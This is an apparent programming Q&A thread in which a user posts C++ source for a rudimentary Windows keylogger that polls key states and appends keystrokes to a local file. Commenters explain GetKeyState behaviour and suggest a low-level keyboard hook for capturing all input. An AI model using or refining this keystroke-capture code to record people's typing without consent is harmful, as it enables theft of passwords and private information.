# detecting if SHIFT is held down

Tags: c++, winapi, keylogger

**Hey there!**
I need my program (a Dev C++ keylogger) to detect whether the key "SHIFT" is held down.Then while "SHIFT" is held down the program is supposed to change from lowercase to uppercase letters ...I use a MSND function called "GeyKeyState"(which "retrieves the status of the specified virtual key") but it does not work.Anyway,I'm not English so I might have made some grammatical mistakes.
 Thanks in advance!

```
#include <iostream>
#include <Windows.h>
#include <iomanip>
#include <WinUser.h>
//#include <ctype.h>

#pragma disable warning(4996);
#define DELAY 170

using namespace std;

void WriteToLog( char key)
{
    FILE *pLogFile;
    pLogFile = fopen("hooked.txt", "a+");
    fprintf(pLogFile, "%c", key);
    fclose(pLogFile);
}

int main()
{
    char i;
    bool MINUSCOLA = true; //inizializziamo "MINUSCOLA" come "true"

    /*verifico se il caps lock non era attivo prima dell'esecuzione del programma*/
    if ((GetKeyState(VK_CAPITAL) & 0X0001) != 0)
    {                                                           
        MINUSCOLA = false;                                              
    }
    else
    {
        MINUSCOLA = true;
    }

    for (i = 0; i <= 165;i++)
    {
        if (GetAsyncKeyState(i) == -32767)              //questo blocco di IF and ELSE nidificati viene eseguita SOLO se viene premuto un qualsiasi tasto
        {
            if ((GetAsyncKeyState(VK_CAPITAL))||((GetAsyncKeyState(i) == -32767) && ((GetKeyState(VK_SHIFT)&0x0001)!=0)))                   //se premo il bloc maiusc  e invertiamo il valore di "MINUSCOLA"
            {
                 MINUSCOLA=!(MINUSCOLA);
            }
            else
            {
                if (MINUSCOLA == true)                          //se non lo premo e "MINUSCOLA" è "true"  il programma stampa caratteri minuscoli       
                {                                                   
                    WriteToLog(i+32);
                }
                else                                            //altrimenti "MINUSCOLA" è necessariamente "false";quindi il programma stamperà lettere maiuscole
                {
                    WriteToLog(i);
                }
            }               
        }           
    }
    Sleep(DELAY);
    return 0;
}
```

Comment: This question has nothing to do with sniffing or packet sniffing. Please avoid using irrelevant tags.

Comment: Look up `SetWindowsHookEx(WH_KEYBOARD_LL, hookfunction, NULL, NULL);` OS will let you know when a key is pressed. `GetKeyState(VK_SHIFT)` will tell if shift key is pressed.

Comment: The [MSDN tells you](https://msdn.microsoft.com/en-us/library/windows/desktop/ms646301.aspx), why `GetKeyState` doesn't work as intended: *"The key status returned from this function changes as a thread reads key messages from its message queue."* You aren't, so you should not have any expectations. Anyway, this question gets asked a million times. Every day. Do some research.

Answer (score 0):

`GeyKeyState` reports the state of the threads input queue, not the global state. MSDN even tells you what to do:

> The key status returned from this function changes as a thread reads key messages from its message queue. The status does not reflect the interrupt-level state associated with the hardware. Use the `GetAsyncKeyState` function to retrieve that information.

A `WH_KEYBOARD_LL` [hook](https://msdn.microsoft.com/en-us/library/windows/desktop/ms644959(v=vs.85).aspx) is a much better option if you need to monitor all keyboard input. You should never pull with a small `Sleep`!

Comment: That only solves the easy part: Monitoring keyboard input. It doesn't solve the hard part: Turning keyboard input into characters.

Comment: @IInspectable No but the example code in the question only deals with virtual key codes and for basic ASCII that is enough. The question is about detecting the shift key, not logging perfect Unicode output.

Comment: You do get dead keys with just ASCII character input, e.g. `^` followed by `a` (depending on the input locale) will form the character `â`. If you suggest using a low-level keyboard hook, it is helpful to know up front, that there's a harder problem down the road. And if you look at the OP's code, you just *know*, that this keylogger is not ever going to see the light of day, so save them some time trying.